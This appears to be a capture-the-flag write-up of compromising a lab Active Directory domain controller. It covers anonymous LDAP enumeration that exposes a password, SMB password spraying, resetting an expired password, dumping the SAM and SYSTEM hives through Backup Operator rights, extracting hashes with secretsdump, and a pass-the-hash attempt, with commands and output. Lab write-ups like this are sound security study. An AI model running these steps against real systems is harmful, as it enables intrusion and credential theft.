Baby - Writeup - Konstantinovitz

## External, Unauthenticated Remote services: - Kerberos - Simple DNS - SMB - `null` -> yes - shares? -> denied - [[RID Brute]]? -> denied - `guest`? -> disabled - Domain Controller: - **Domain:** `baby.vl` - **Machine:** `BabyDC.baby.vl` - LDAP - Anon bind? -> yes - Users? -> yes - One of them contains password <3 ### LDAP + Password Spray Generate a list of users ```sh # unauthenticated search ldapsearch -x -H ldap://$RHOST -b "DC=baby,DC=vl" "(objectClass=user)" > ldap-users.out # read out user descriptions to terminal grep "description:" ldap-users.out # reveals password: BabyStart123! # read out users to terminal grep "sAMAccountName:" ldap-users.out # pipe them to file grep "sAMAccountName:" ldap-users.out | awk '{print $2}' > users.txt ``` I'll comprise a list of users by hand: ``` Jacqueline.Barnett Ashley.Webb Hugh.George Leonard.Dyer Ian.Walker Connor.Wilkinson Joseph.Hughes Kerry.Wilson Teresa.Bell Caroline.Robinson ``` Let's spray those with the password: ``` ╭─[λ]-[admin.konstantinovitz.com]-[/targets/baby/creds]-[10.10.100.147] ╰─> nxc smb $RHOST -u users.txt -p passwords.txt --continue-on-success SMB 10.10.100.147 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) SMB 10.10.100.147 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE SMB 10.10.100.147 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE SMB 10.10.100.147 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE SMB 10.10.100.147 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE SMB 10.10.100.147 445 BABYDC [-] baby.vl\Ian.Walker:BabyStart123! STATUS_LOGON_FAILURE SMB 10.10.100.147 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE SMB 10.10.100.147 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE SMB 10.10.100.147 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE SMB 10.10.100.147 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE SMB 10.10.100.147 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE ``` We get a hit for `Caroline.Robinson`, but we must change her password somehow.... ```sh smbpasswd -r $RHOST -U 'Caroline.Robinson' ``` We set the password to `password123!` ## `Caroline.Robinson` - SMB - Shares - `R` on [[SMB Share - ADMIN$]] - GG? - Maybe read ntds.dit?? - Access denied for `NTDS/` folder - Treating this as rabbit hole for now - `RW` on `C

- winrm -> yes - bloodhound <3 - `MemberOf` [[AD Group - Backup Operator]] - Wiiin ### [[AD Group - Backup Operator]] ``` # verify access whoami /priv # yields SeBackupPrivilege ``` ```powershell reg save hklm\sam c:\windows\tasks\SAM reg save hklm\system c:\windows\tasks\SYSTEM ``` Download those and run ```sh secretsdump.py -sam SAM -system SYSTEM LOCAL ``` ``` secretsdump.py -sam SAM -system SYSTEM LOCAL /home/noctua/.local/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. import pkg_resources Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up... ``` - Why do only some accounts show up here? - Is it only local system accounts?? Soooo.... I'll attempt to connect as `Administrator`: ``` evil-winrm -i $RHOST -u 'Administrator' -H '8d992faed38128ae85e95fa35868bb43' ``` No love there. - Crack it? - Password appears to be too long... - Dosen't show up on crack station. I'm starting to think that I'm down the wrong path here.... So apparently was supposed to do a [[Volume Shadow Copy Service]]? ## Lessons Learned - Generate new target script - nmap scripts - default - all ports - nmap quick - apache ldap browser - learned not to solely rely on single `ldapsearch` or netexec to discover usernames from `ldap` - [[AD - Resetting Expired Passwords]]